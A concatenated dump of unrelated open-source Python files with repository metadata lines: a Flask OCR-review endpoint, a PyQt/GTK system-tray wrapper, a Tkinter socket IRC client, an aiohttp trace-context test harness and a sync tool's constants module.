ds = DocSegment.query.filter(DocSegment.id == segmentid).first()
if not ds:
abort(404)
ds.viewcount = max(0, ds.viewcount-1)
app.dbobj.session.add(ds)
if not revid or not revid.isdigit():
app.dbobj.session.commit()
return
revid = int(revid)
old = DocSegmentReview.query.filter(DocSegmentReview.id == revid, DocSegmentReview.user_id == user.id).first()
if not old:
abort(404)
app.dbobj.session.delete(old)
app.dbobj.session.commit()
return jsonify({'status': 'ok', 'id': revid})
@app.route('/api/review/<int:segmentid>')
def review_submit(segmentid):
user = get_user_or_abort()
ds = DocSegment.query.filter(DocSegment.id == segmentid).first()
if not ds:
abort(404)
text = request.args.get('text')
skip = request.args.get('skip')
if text is None and not skip:
abort(404)
timestamp = datetime.datetime.now()
ds.viewcount += 1
app.dbobj.session.add(ds)
if skip:
app.dbobj.session.commit()
return jsonify({'status': 'ok'})
old = DocSegmentReview.query\
.filter(DocSegmentReview.segment_id == ds.id)\
.order_by(DocSegmentReview.rev.desc())\
.first()
if old is not None:
rev = old.rev + 1
else:
rev = 1
newrev = DocSegmentReview(segment=ds, rev=rev, timestamp=timestamp, user=user, text=text)
app.dbobj.session.add(newrev)
app.dbobj.session.commit()
return jsonify({'status': 'ok', 'id': newrev.id})
@app.route('/api/reviewdata', methods=['GET'])
def reviewdata():
# Find a random early page with lots of unreviewed items. This way even
# with multiple simulteanous users they should get different pages.
minviewcount = app.dbobj.session.query(func.min(DocSegment.viewcount)).one()[0]
q = app.dbobj.session.query(DocSegment.doc_id, DocSegment.page)\
.filter(DocSegment.ocrtext != None)\
.filter(DocSegment.viewcount <= minviewcount)\
.distinct()
pages = list(q.all())
app.logger.debug("%d pages with segments of only %d views" % (len(pages), minviewcount))
# FIXME: this kinda works, but as all the pages get reviewed it will tend
# toward giving all users the same page. not really a problem until I have
# more than 1 user.
docid, page = random.choice(pages)
q = DocSegment.query.filter(DocSegment.doc_id == docid)\
.filter(DocSegment.page == page)\
.filter(DocSegment.viewcount <= minviewcount)
segments = q.all()
if not segments:
abort(404)
segdata = []
for d in segments:
if d.usertext is None:
txt = ocrfix.guess_fix(d.ocrtext)
suggests = ocrfix.suggestions(d)
else:
txt = d.usertext.text
suggests = []
lines = max(len(d.ocrtext.splitlines()), len(txt.splitlines()))
segdata.append(dict(ocrtext=d.ocrtext, text=txt, segment_id=d.id,
x1=d.x1, x2=d.x2, y1=d.y1, y2=d.y2,
textlines=lines, docid=docid, page=page+1, suggests=suggests))
return jsonify(dict(segments=segdata, docid=docid, page=page+1))
@app.route('/review', methods=['GET', 'POST'])
def review():
""" Review page """
error = None
user = None
if request.method == 'POST':
user, error = dologin()
if 'username' in session:
u = get_user_or_abort()
uname = u.name
else:
uname = None
return render_template('review.html', user=uname, error=error)
| bsd-2-clause | 2,451,348,942,650,668,500 | 27.81875 | 114 | 0.605942 | false | 3.402952 | false | false | false |
falkTX/Cadence | src/systray.py | 1 | 23718 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# KDE, App-Indicator or Qt Systray
# Copyright (C) 2011-2018 Filipe Coelho <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the COPYING file
# Imports (Global)
import os, sys
if True:
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QAction, QMainWindow, QMenu, QSystemTrayIcon
else:
from PyQt4.QtCore import QTimer
from PyQt4.QtGui import QIcon
from PyQt4.QtGui import QAction, QMainWindow, QMenu, QSystemTrayIcon
try:
if False and os.getenv("DESKTOP_SESSION") in ("ubuntu", "ubuntu-2d") and not os.path.exists("/var/cadence/no_app_indicators"):
from gi import require_version
require_version('Gtk', '3.0')
from gi.repository import Gtk
require_version('AppIndicator3', '0.1')
from gi.repository import AppIndicator3 as AppIndicator
TrayEngine = "AppIndicator"
#elif os.getenv("KDE_SESSION_VERSION") >= 5:
#TrayEngine = "Qt"
#elif os.getenv("KDE_FULL_SESSION") or os.getenv("DESKTOP_SESSION") == "kde-plasma":
#from PyKDE5.kdeui import KAction, KIcon, KMenu, KStatusNotifierItem
#TrayEngine = "KDE"
else:
TrayEngine = "Qt"
except:
TrayEngine = "Qt"
print("Using Tray Engine '%s'" % TrayEngine)
iActNameId = 0
iActWidget = 1
iActParentMenuId = 2
iActFunc = 3
iSepNameId = 0
iSepWidget = 1
iSepParentMenuId = 2
iMenuNameId = 0
iMenuWidget = 1
iMenuParentMenuId = 2
# Get Icon from user theme, using our own as backup (Oxygen)
def getIcon(icon, size=16):
return QIcon.fromTheme(icon, QIcon(":/%ix%i/%s.png" % (size, size, icon)))
# Global Systray class
class GlobalSysTray(object):
def __init__(self, parent, name, icon):
object.__init__(self)
self._app = None
self._parent = parent
self._gtk_running = False
self._quit_added = False
self.act_indexes = []
self.sep_indexes = []
self.menu_indexes = []
if TrayEngine == "KDE":
self.menu = KMenu(parent)
self.menu.setTitle(name)
self.tray = KStatusNotifierItem()
self.tray.setAssociatedWidget(parent)
self.tray.setCategory(KStatusNotifierItem.ApplicationStatus)
self.tray.setContextMenu(self.menu)
self.tray.setIconByPixmap(getIcon(icon))
self.tray.setTitle(name)
self.tray.setToolTipTitle(" ")
self.tray.setToolTipIconByPixmap(getIcon(icon))
# Double-click is managed by KDE
elif TrayEngine == "AppIndicator":
self.menu = Gtk.Menu()
self.tray = AppIndicator.Indicator.new(name, icon, AppIndicator.IndicatorCategory.APPLICATION_STATUS)
self.tray.set_menu(self.menu)
# Double-click is not possible with App-Indicators
elif TrayEngine == "Qt":
self.menu = QMenu(parent)
self.tray = QSystemTrayIcon(getIcon(icon))
self.tray.setContextMenu(self.menu)
self.tray.setParent(parent)
self.tray.activated.connect(self.qt_systray_clicked)
# -------------------------------------------------------------------------------------------
def addAction(self, act_name_id, act_name_string, is_check=False):
if TrayEngine == "KDE":
act_widget = KAction(act_name_string, self.menu)
act_widget.setCheckable(is_check)
self.menu.addAction(act_widget)
elif TrayEngine == "AppIndicator":
if is_check:
act_widget = Gtk.CheckMenuItem(act_name_string)
else:
act_widget = Gtk.ImageMenuItem(act_name_string)
act_widget.set_image(None)
act_widget.show()
self.menu.append(act_widget)
elif TrayEngine == "Qt":
act_widget = QAction(act_name_string, self.menu)
act_widget.setCheckable(is_check)
self.menu.addAction(act_widget)
else:
act_widget = None
act_obj = [None, None, None, None]
act_obj[iActNameId] = act_name_id
act_obj[iActWidget] = act_widget
self.act_indexes.append(act_obj)
def addSeparator(self, sep_name_id):
if TrayEngine == "KDE":
sep_widget = self.menu.addSeparator()
elif TrayEngine == "AppIndicator":
sep_widget = Gtk.SeparatorMenuItem()
sep_widget.show()
self.menu.append(sep_widget)
elif TrayEngine == "Qt":
sep_widget = self.menu.addSeparator()
else:
sep_widget = None
sep_obj = [None, None, None]
sep_obj[iSepNameId] = sep_name_id
sep_obj[iSepWidget] = sep_widget
self.sep_indexes.append(sep_obj)
def addMenu(self, menu_name_id, menu_name_string):
if TrayEngine == "KDE":
menu_widget = KMenu(menu_name_string, self.menu)
self.menu.addMenu(menu_widget)
elif TrayEngine == "AppIndicator":
menu_widget = Gtk.MenuItem(menu_name_string)
menu_parent = Gtk.Menu()
menu_widget.set_submenu(menu_parent)
menu_widget.show()
self.menu.append(menu_widget)
elif TrayEngine == "Qt":
menu_widget = QMenu(menu_name_string, self.menu)
self.menu.addMenu(menu_widget)
else:
menu_widget = None
menu_obj = [None, None, None]
menu_obj[iMenuNameId] = menu_name_id
menu_obj[iMenuWidget] = menu_widget
self.menu_indexes.append(menu_obj)
# -------------------------------------------------------------------------------------------
def addMenuAction(self, menu_name_id, act_name_id, act_name_string, is_check=False):
i = self.get_menu_index(menu_name_id)
if i < 0: return
menu_widget = self.menu_indexes[i][iMenuWidget]
if TrayEngine == "KDE":
act_widget = KAction(act_name_string, menu_widget)
act_widget.setCheckable(is_check)
menu_widget.addAction(act_widget)
elif TrayEngine == "AppIndicator":
menu_widget = menu_widget.get_submenu()
if is_check:
act_widget = Gtk.CheckMenuItem(act_name_string)
else:
act_widget = Gtk.ImageMenuItem(act_name_string)
act_widget.set_image(None)
act_widget.show()
menu_widget.append(act_widget)
elif TrayEngine == "Qt":
act_widget = QAction(act_name_string, menu_widget)
act_widget.setCheckable(is_check)
menu_widget.addAction(act_widget)
else:
act_widget = None
act_obj = [None, None, None, None]
act_obj[iActNameId] = act_name_id
act_obj[iActWidget] = act_widget
act_obj[iActParentMenuId] = menu_name_id
self.act_indexes.append(act_obj)
def addMenuSeparator(self, menu_name_id, sep_name_id):
i = self.get_menu_index(menu_name_id)
if i < 0: return
menu_widget = self.menu_indexes[i][iMenuWidget]
if TrayEngine == "KDE":
sep_widget = menu_widget.addSeparator()
elif TrayEngine == "AppIndicator":
menu_widget = menu_widget.get_submenu()
sep_widget = Gtk.SeparatorMenuItem()
sep_widget.show()
menu_widget.append(sep_widget)
elif TrayEngine == "Qt":
sep_widget = menu_widget.addSeparator()
else:
sep_widget = None
sep_obj = [None, None, None]
sep_obj[iSepNameId] = sep_name_id
sep_obj[iSepWidget] = sep_widget
sep_obj[iSepParentMenuId] = menu_name_id
self.sep_indexes.append(sep_obj)
#def addSubMenu(self, menu_name_id, new_menu_name_id, new_menu_name_string):
#menu_index = self.get_menu_index(menu_name_id)
#if menu_index < 0: return
#menu_widget = self.menu_indexes[menu_index][1]
##if TrayEngine == "KDE":
##new_menu_widget = KMenu(new_menu_name_string, self.menu)
##menu_widget.addMenu(new_menu_widget)
##elif TrayEngine == "AppIndicator":
##new_menu_widget = Gtk.MenuItem(new_menu_name_string)
##new_menu_widget.show()
##menu_widget.get_submenu().append(new_menu_widget)
##parent_menu_widget = Gtk.Menu()
##new_menu_widget.set_submenu(parent_menu_widget)
##else:
#if (1):
#new_menu_widget = QMenu(new_menu_name_string, self.menu)
#menu_widget.addMenu(new_menu_widget)
#self.menu_indexes.append([new_menu_name_id, new_menu_widget, menu_name_id])
# -------------------------------------------------------------------------------------------
def connect(self, act_name_id, act_func):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "AppIndicator":
act_widget.connect("activate", self.gtk_call_func, act_name_id)
elif TrayEngine in ("KDE", "Qt"):
act_widget.triggered.connect(act_func)
self.act_indexes[i][iActFunc] = act_func
# -------------------------------------------------------------------------------------------
#def setActionChecked(self, act_name_id, yesno):
#index = self.get_act_index(act_name_id)
#if index < 0: return
#act_widget = self.act_indexes[index][1]
##if TrayEngine == "KDE":
##act_widget.setChecked(yesno)
##elif TrayEngine == "AppIndicator":
##if type(act_widget) != Gtk.CheckMenuItem:
##return # Cannot continue
##act_widget.set_active(yesno)
##else:
#if (1):
#act_widget.setChecked(yesno)
def setActionEnabled(self, act_name_id, yesno):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "KDE":
act_widget.setEnabled(yesno)
elif TrayEngine == "AppIndicator":
act_widget.set_sensitive(yesno)
elif TrayEngine == "Qt":
act_widget.setEnabled(yesno)
def setActionIcon(self, act_name_id, icon):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "KDE":
act_widget.setIcon(KIcon(icon))
elif TrayEngine == "AppIndicator":
if not isinstance(act_widget, Gtk.ImageMenuItem):
# Cannot use icons here
return
act_widget.set_image(Gtk.Image.new_from_icon_name(icon, Gtk.IconSize.MENU))
#act_widget.set_always_show_image(True)
elif TrayEngine == "Qt":
act_widget.setIcon(getIcon(icon))
def setActionText(self, act_name_id, text):
i = self.get_act_index(act_name_id)
if i < 0: return
act_widget = self.act_indexes[i][iActWidget]
if TrayEngine == "KDE":
act_widget.setText(text)
elif TrayEngine == "AppIndicator":
if isinstance(act_widget, Gtk.ImageMenuItem):
# Fix icon reset
last_icon = act_widget.get_image()
act_widget.set_label(text)
act_widget.set_image(last_icon)
else:
act_widget.set_label(text)
elif TrayEngine == "Qt":
act_widget.setText(text)
def setIcon(self, icon):
if TrayEngine == "KDE":
self.tray.setIconByPixmap(getIcon(icon))
#self.tray.setToolTipIconByPixmap(getIcon(icon))
elif TrayEngine == "AppIndicator":
self.tray.set_icon(icon)
elif TrayEngine == "Qt":
self.tray.setIcon(getIcon(icon))
def setToolTip(self, text):
if TrayEngine == "KDE":
self.tray.setToolTipSubTitle(text)
elif TrayEngine == "AppIndicator":
# ToolTips are disabled in App-Indicators by design
pass
elif TrayEngine == "Qt":
self.tray.setToolTip(text)
# -------------------------------------------------------------------------------------------
#def removeAction(self, act_name_id):
#index = self.get_act_index(act_name_id)
#if index < 0: return
#act_widget = self.act_indexes[index][1]
#parent_menu_widget = self.get_parent_menu_widget(self.act_indexes[index][2])
##if TrayEngine == "KDE":
##parent_menu_widget.removeAction(act_widget)
##elif TrayEngine == "AppIndicator":
##act_widget.hide()
##parent_menu_widget.remove(act_widget)
##else:
#if (1):
#parent_menu_widget.removeAction(act_widget)
#self.act_indexes.pop(index)
#def removeSeparator(self, sep_name_id):
#index = self.get_sep_index(sep_name_id)
#if index < 0: return
#sep_widget = self.sep_indexes[index][1]
#parent_menu_widget = self.get_parent_menu_widget(self.sep_indexes[index][2])
##if TrayEngine == "KDE":
##parent_menu_widget.removeAction(sep_widget)
##elif TrayEngine == "AppIndicator":
##sep_widget.hide()
##parent_menu_widget.remove(sep_widget)
##else:
#if (1):
#parent_menu_widget.removeAction(sep_widget)
#self.sep_indexes.pop(index)
#def removeMenu(self, menu_name_id):
#index = self.get_menu_index(menu_name_id)
#if index < 0: return
#menu_widget = self.menu_indexes[index][1]
#parent_menu_widget = self.get_parent_menu_widget(self.menu_indexes[index][2])
##if TrayEngine == "KDE":
##parent_menu_widget.removeAction(menu_widget.menuAction())
##elif TrayEngine == "AppIndicator":
##menu_widget.hide()
##parent_menu_widget.remove(menu_widget.get_submenu())
##else:
#if (1):
#parent_menu_widget.removeAction(menu_widget.menuAction())
#self.remove_actions_by_menu_name_id(menu_name_id)
#self.remove_separators_by_menu_name_id(menu_name_id)
#self.remove_submenus_by_menu_name_id(menu_name_id)
# -------------------------------------------------------------------------------------------
#def clearAll(self):
##if TrayEngine == "KDE":
##self.menu.clear()
##elif TrayEngine == "AppIndicator":
##for child in self.menu.get_children():
##self.menu.remove(child)
##else:
#if (1):
#self.menu.clear()
#self.act_indexes = []
#self.sep_indexes = []
#self.menu_indexes = []
#def clearMenu(self, menu_name_id):
#menu_index = self.get_menu_index(menu_name_id)
#if menu_index < 0: return
#menu_widget = self.menu_indexes[menu_index][1]
##if TrayEngine == "KDE":
##menu_widget.clear()
##elif TrayEngine == "AppIndicator":
##for child in menu_widget.get_submenu().get_children():
##menu_widget.get_submenu().remove(child)
##else:
#if (1):
#menu_widget.clear()
#list_of_submenus = [menu_name_id]
#for x in range(0, 10): # 10x level deep, should cover all cases...
#for this_menu_name_id, menu_widget, parent_menu_id in self.menu_indexes:
#if parent_menu_id in list_of_submenus and this_menu_name_id not in list_of_submenus:
#list_of_submenus.append(this_menu_name_id)
#for this_menu_name_id in list_of_submenus:
#self.remove_actions_by_menu_name_id(this_menu_name_id)
#self.remove_separators_by_menu_name_id(this_menu_name_id)
#self.remove_submenus_by_menu_name_id(this_menu_name_id)
# -------------------------------------------------------------------------------------------
def getTrayEngine(self):
return TrayEngine
def isTrayAvailable(self):
if TrayEngine in ("KDE", "Qt"):
# Ask Qt
return QSystemTrayIcon.isSystemTrayAvailable()
if TrayEngine == "AppIndicator":
# Ubuntu/Unity always has a systray
return True
return False
def handleQtCloseEvent(self, event):
if self.isTrayAvailable() and self._parent.isVisible():
event.accept()
self.__hideShowCall()
return
self.close()
QMainWindow.closeEvent(self._parent, event)
# -------------------------------------------------------------------------------------------
def show(self):
if not self._quit_added:
self._quit_added = True
if TrayEngine != "KDE":
self.addSeparator("_quit")
self.addAction("show", self._parent.tr("Minimize"))
self.addAction("quit", self._parent.tr("Quit"))
self.setActionIcon("quit", "application-exit")
self.connect("show", self.__hideShowCall)
self.connect("quit", self.__quitCall)
if TrayEngine == "KDE":
self.tray.setStatus(KStatusNotifierItem.Active)
elif TrayEngine == "AppIndicator":
self.tray.set_status(AppIndicator.IndicatorStatus.ACTIVE)
elif TrayEngine == "Qt":
self.tray.show()
def hide(self):
if TrayEngine == "KDE":
self.tray.setStatus(KStatusNotifierItem.Passive)
elif TrayEngine == "AppIndicator":
self.tray.set_status(AppIndicator.IndicatorStatus.PASSIVE)
elif TrayEngine == "Qt":
self.tray.hide()
def close(self):
if TrayEngine == "KDE":
self.menu.close()
elif TrayEngine == "AppIndicator":
if self._gtk_running:
self._gtk_running = False
Gtk.main_quit()
elif TrayEngine == "Qt":
self.menu.close()
def exec_(self, app):
self._app = app
if TrayEngine == "AppIndicator":
self._gtk_running = True
return Gtk.main()
else:
return app.exec_()
# -------------------------------------------------------------------------------------------
def get_act_index(self, act_name_id):
for i in range(len(self.act_indexes)):
if self.act_indexes[i][iActNameId] == act_name_id:
return i
else:
print("systray.py - Failed to get action index for %s" % act_name_id)
return -1
def get_sep_index(self, sep_name_id):
for i in range(len(self.sep_indexes)):
if self.sep_indexes[i][iSepNameId] == sep_name_id:
return i
else:
print("systray.py - Failed to get separator index for %s" % sep_name_id)
return -1
def get_menu_index(self, menu_name_id):
for i in range(len(self.menu_indexes)):
if self.menu_indexes[i][iMenuNameId] == menu_name_id:
return i
else:
print("systray.py - Failed to get menu index for %s" % menu_name_id)
return -1
#def get_parent_menu_widget(self, parent_menu_id):
#if parent_menu_id != None:
#menu_index = self.get_menu_index(parent_menu_id)
#if menu_index >= 0:
#return self.menu_indexes[menu_index][1]
#else:
#print("systray.py::Failed to get parent Menu widget for", parent_menu_id)
#return None
#else:
#return self.menu
#def remove_actions_by_menu_name_id(self, menu_name_id):
#h = 0
#for i in range(len(self.act_indexes)):
#act_name_id, act_widget, parent_menu_id, act_func = self.act_indexes[i - h]
#if parent_menu_id == menu_name_id:
#self.act_indexes.pop(i - h)
#h += 1
#def remove_separators_by_menu_name_id(self, menu_name_id):
#h = 0
#for i in range(len(self.sep_indexes)):
#sep_name_id, sep_widget, parent_menu_id = self.sep_indexes[i - h]
#if parent_menu_id == menu_name_id:
#self.sep_indexes.pop(i - h)
#h += 1
#def remove_submenus_by_menu_name_id(self, submenu_name_id):
#h = 0
#for i in range(len(self.menu_indexes)):
#menu_name_id, menu_widget, parent_menu_id = self.menu_indexes[i - h]
#if parent_menu_id == submenu_name_id:
#self.menu_indexes.pop(i - h)
#h += 1
# -------------------------------------------------------------------------------------------
def gtk_call_func(self, gtkmenu, act_name_id):
i = self.get_act_index(act_name_id)
if i < 0: return None
return self.act_indexes[i][iActFunc]
def qt_systray_clicked(self, reason):
if reason in (QSystemTrayIcon.DoubleClick, QSystemTrayIcon.Trigger):
self.__hideShowCall()
# -------------------------------------------------------------------------------------------
def __hideShowCall(self):
if self._parent.isVisible():
self.setActionText("show", self._parent.tr("Restore"))
self._parent.hide()
if self._app:
self._app.setQuitOnLastWindowClosed(False)
else:
self.setActionText("show", self._parent.tr("Minimize"))
if self._parent.isMaximized():
self._parent.showMaximized()
else:
self._parent.showNormal()
if self._app:
self._app.setQuitOnLastWindowClosed(True)
QTimer.singleShot(500, self.__raiseWindow)
def __quitCall(self):
if self._app:
self._app.setQuitOnLastWindowClosed(True)
self._parent.hide()
self._parent.close()
if self._app:
self._app.quit()
def __raiseWindow(self):
self._parent.activateWindow()
self._parent.raise_()
#--------------- main ------------------
if __name__ == '__main__':
from PyQt5.QtWidgets import QApplication, QDialog, QMessageBox
class ExampleGUI(QDialog):
def __init__(self, parent=None):
QDialog.__init__(self, parent)
self.setWindowIcon(getIcon("audacity"))
self.systray = GlobalSysTray(self, "Claudia", "claudia")
self.systray.addAction("about", self.tr("About"))
self.systray.setIcon("audacity")
self.systray.setToolTip("Demo systray app")
self.systray.connect("about", self.about)
self.systray.show()
def about(self):
QMessageBox.about(self, self.tr("About"), self.tr("Systray Demo"))
def done(self, r):
QDialog.done(self, r)
self.close()
def closeEvent(self, event):
self.systray.close()
QDialog.closeEvent(self, event)
app = QApplication(sys.argv)
gui = ExampleGUI()
gui.show()
sys.exit(gui.systray.exec_(app))
| gpl-2.0 | 3,553,723,061,951,008,000 | 33.624818 | 130 | 0.548571 | false | 3.674361 | false | false | false |
Griffiths117/TG-s-IRC | client/IRClient.py | 1 | 4985 | import socket, _thread, tkinter as tk, tkinter.ttk as ttk
from time import strftime, sleep
from tkinter import messagebox, simpledialog
#===========================================================================#
class BasicInputDialog:
def __init__(self,question,title=None,hideWindow=True):
if title == None:
title = PROGRAM_TITLE
self.master = tk.Tk()
self.string = ''
self.master.title(title)
self.frame = tk.Frame(self.master)
self.frame.pack()
self.acceptInput(question)
self.waitForInput()
try:
self.inputted = self.getText()
except Exception:
quit()
def acceptInput(self,question):
r = self.frame
k = ttk.Label(r,text=question)
k.grid(row=0,column=0)
self.e = ttk.Entry(r,width=30)
self.e.grid(row=1,columnspan=2)
self.e.focus_set()
b = ttk.Button(r,text='Enter',command=self.getText)
self.master.bind("<Return>", self.getText)
b.grid(row=0,column=1,padx=5,pady=5)
def getText(self,event=None):
self.string = self.e.get()
self.master.quit()
return self.string
def get(self):
self.master.destroy()
return self.inputted
def getString(self):
return self.string
def waitForInput(self):
self.master.mainloop()
#Main window application
class MainWindow(tk.Tk):
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
self.title(PROGRAM_TITLE)
self.resizable(0,0)
self.displayBox = tk.Text(self, width=100, font=THEME.font, bg=THEME.colors[3], fg=THEME.colors[0])
self.displayBox.pack()
self.displayBox.configure(state='disabled')
self.msgEntry = tk.Entry(self,width=100, font=THEME.font, bg=THEME.colors[3], fg=THEME.colors[1], insertbackground = THEME.colors[2])
self.msgEntry.pack()
self.bind("<Return>", self.sendText)
def sendText(self,event=None):
send(newMessage(self.msgEntry.get()).toString())
self.msgEntry.delete(0, 'end')
class Theme:
def __init__(self, font, colors):
self.colors = colors #Message,input,cursor,background
self.font = font
class Message:
#Static variables for formatting
sep = "§"
pref = "msg="
SUDO_PREF = "server="
#Initiate, if timestamp is not entered it will be current time
def __init__(self, sender, plainText, timestamp = None):
if timestamp == None:
timestamp = strftime("%d-%m-%Y %H:%M:%S")
self.plainText = plainText
self.sender = sender
self.timestamp = timestamp
#Sends to string object to be sent through socket
def toString(self):
return self.pref + self.sender + self.sep + self.timestamp + self.sep + self.plainText
#Turns recieved strings into messages: returns None if invalid.
def fromString(text):
if not text.startswith(Message.pref):
return Message("SERVER",text[len(Message.SUDO_PREF):]) if text.startswith(Message.SUDO_PREF) else None
data = text[len(Message.pref):].split(Message.sep,2)
return Message(data[0],data[2],data[1])
#Converts into display string
def toFormattedString(self):
return "["+self.timestamp + "] <" + self.sender + ">: "+self.plainText
#===========================================================================#
def send(msg):
try:
SEND_SOCKET.send(bytes(msg,'UTF-8'))
except:
print("Unable to send message")
def newMessage(msg):
return Message(NICKNAME, msg)
def waitForMessages(s,window):
#This should be run in a seperate thread: constantly recieves new messages
sleep(0.5)
while True:
#Recieve message and convert to string
msg = s.recv(1024)
msg = str(msg, "UTF-8")
#Checking if message follows Message class format
m = Message.fromString(msg)
if m == None: continue
msg = m.toFormattedString()
#Show in window
writeTo(window.displayBox,msg)
def writeTo(textBox,msg):
textBox.configure(state='normal')
textBox.insert('end',msg)
textBox.configure(state='disabled')
textBox.see(tk.END)
def shutdownHook():
send("!DISCONNECT")
root.destroy()
quit()
#===========================================================================#
PROGRAM_TITLE = 'TG\'s IRC'
SERVER_IP = BasicInputDialog("Enter IP:").get()
NICKNAME = BasicInputDialog("Enter Nickname:").get()
THEME = Theme(("Consolas", 10), ['aqua', 'cyan', 'white', 'black'])
RECV_SOCKET = socket.socket()
RECV_SOCKET.connect((SERVER_IP, 20075))
SEND_SOCKET = socket.socket()
SEND_SOCKET.connect((SERVER_IP, 20074))
send("!nickname="+NICKNAME)
root = MainWindow()
_thread.start_new_thread(waitForMessages, (RECV_SOCKET,root,))
root.protocol("WM_DELETE_WINDOW", shutdownHook)
root.mainloop()
| mit | -6,780,789,818,688,822,000 | 29.956522 | 141 | 0.595907 | false | 3.632653 | false | false | false |
TraceContext/tracecontext-spec | test/server.py | 1 | 3239 | from aiohttp import ClientSession, ClientTimeout, ContentTypeError, web
from multidict import MultiDict
class AsyncTestServer(object):
scopes = {}
def __init__(self, host, port, timeout = 5):
self.host = host
self.port = port
self.timeout = ClientTimeout(total = timeout)
self.app = web.Application()
self.app.add_routes([
web.post('/{scope}', self.scope_handler),
])
async def start(self):
self.runner = web.AppRunner(self.app)
await self.runner.setup()
self.site = web.TCPSite(self.runner, self.host, self.port)
await self.site.start()
print('harness listening on http://%s:%s'%(self.host, self.port))
async def stop(self):
await self.runner.cleanup()
async def scope_handler(self, request):
scope_id = request.match_info['scope'].split('.', maxsplit = 1)
callback_id = None if len(scope_id) == 1 else scope_id[1]
scope_id = scope_id[0]
arguments = await request.json()
scope = None
if callback_id:
scope = self.scopes[scope_id]
scope[callback_id] = {
'headers': list(request.headers.items()),
'arguments': arguments,
}
else:
scope = {
'headers': list(request.headers.items()),
'arguments': arguments,
'results': [],
}
self.scopes[scope_id] = scope
if not arguments:
return web.json_response(None)
if not isinstance(arguments, list):
arguments = [arguments]
for action in arguments:
headers = [['Accept', 'application/json']]
if 'headers' in action:
headers += action['headers']
async with ClientSession(headers = headers, timeout = self.timeout) as session:
arguments = []
if 'arguments' in action:
arguments = action['arguments'] or []
result = {}
result['url'] = action['url']
scope['results'].append(result)
try:
async with session.post(action['url'], json = arguments) as response:
result['status'] = response.status
result['headers'] = list(response.headers.items())
result['body'] = await response.json(content_type = 'application/json')
except ContentTypeError as err:
result['body'] = await response.text()
except Exception as err:
result['exception'] = type(err).__name__
result['msg'] = str(err)
if not callback_id:
del self.scopes[scope_id]
return web.json_response(scope)
class TestServer(object):
def __init__(self, host, port, timeout = 5):
import asyncio
from threading import Thread
self.loop = asyncio.get_event_loop()
self.server = AsyncTestServer(host, port, timeout)
self.thread = Thread(target = self.monitor)
self.run = True
def monitor(self):
import asyncio
while self.run:
self.loop.run_until_complete(asyncio.sleep(0.2))
def start(self):
self.loop.run_until_complete(self.server.start())
self.thread.start()
def stop(self):
self.run = False
self.thread.join()
self.loop.run_until_complete(self.server.stop())
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
if __name__ == '__main__':
import sys
host = '127.0.0.1'
port = 7777
if len(sys.argv) >= 2:
host = sys.argv[1]
if len(sys.argv) >= 3:
port = int(sys.argv[2])
with TestServer(host = host, port = port) as server:
input('Press Enter to quit...')
| apache-2.0 | -567,431,452,355,279,040 | 27.663717 | 82 | 0.661624 | false | 3.138566 | false | false | false |
kichkasch/pisi | pisiconstants.py | 1 | 4235 | """
Module for definition of shared constants between the modules.
This file is part of Pisi.
Pisi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Pisi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Pisi. If not, see <http://www.gnu.org/licenses/>
"""
PISI_NAME = 'PISI'
"""'About'-information for user - program name"""
PISI_COMMENTS = "PISI is synchronizing information"
"""'About'-information for user - comments / explainations"""
PISI_VERSION = '0.5.3' #'-svn-' #
"""'About'-information for user - current version"""
FILEPATH_COPYING = "/opt/pisi/COPYING"
"""'About'-information for user - where to find the 'licence' file"""
PISI_AUTHORS = ["Esben Damgaard","Michael Pilgermann"]
"""'About'-information for user - list of programmers"""
PISI_HOMEPAGE = "http://freshmeat.net/projects/pisiom"
"""'About'-information for user - program home page"""
PISI_TRANSLATOR_CREDITS = None
"""'About'-information for user - list of translators"""
PISI_DOCUMENTERS = ['Michael Pilgermann']
"""'About'-information for user - list of documenters"""
CONSOLE_PROGRESSBAR_WIDTH = 80
"""Length of progress bar in CLI mode"""
MODE_CALENDAR = 0
"""Type of sources to deal with are calendars"""
MODE_CONTACTS = 1
"""Type of sources to deal with are contacts"""
MODE_STRINGS = ['calendar', 'contacts']
"""Names for the types of sources in order"""
MERGEMODE_SKIP = 0
"""Resolve conflicts between two entries from two sources by skipping the entry"""
MERGEMODE_FLUSH_A = 1
"""Resolve conflicts between two entries from two sources by flushing the entire data repository for the first data source"""
MERGEMODE_FLUSH_B = 2
"""Resolve conflicts between two entries from two sources by flushing the entire data repository for the second data source"""
MERGEMODE_OVERWRITE_A = 3
"""Resolve conflicts between two entries from two sources by overwriting the single entry on the first data source"""
MERGEMODE_OVERWRITE_B = 4
"""Resolve conflicts between two entries from two sources by overwriting the single entry on the second data source"""
MERGEMODE_MANUALCONFIRM = 5
"""Resolve conflicts between two entries from two sources by asking the user for decision for every single entry"""
MERGEMODE_STRINGS = ["Skip", "Flush source 1", "Flush source 2", "Overwrite entry in source 1", "Overwrite entry in source 2", "Manual confirmation"]
"""Names of merge modes in order"""
ACTIONID_ADD = 0
"""Entry in the history of activities for synchronization modules - here for ADD"""
ACTIONID_DELETE = 1
"""Entry in the history of activities for synchronization modules - here for DELETE"""
ACTIONID_MODIFY = 2
"""Entry in the history of activities for synchronization modules - here for MODIFY"""
GOOGLE_CONTACTS_APPNAME = "pisi" + PISI_VERSION
"""application name to use for connecting against google contacts services"""
